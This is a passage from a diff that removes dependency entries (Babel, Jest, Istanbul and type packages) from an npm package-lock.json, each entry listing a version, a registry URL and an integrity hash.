- }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": 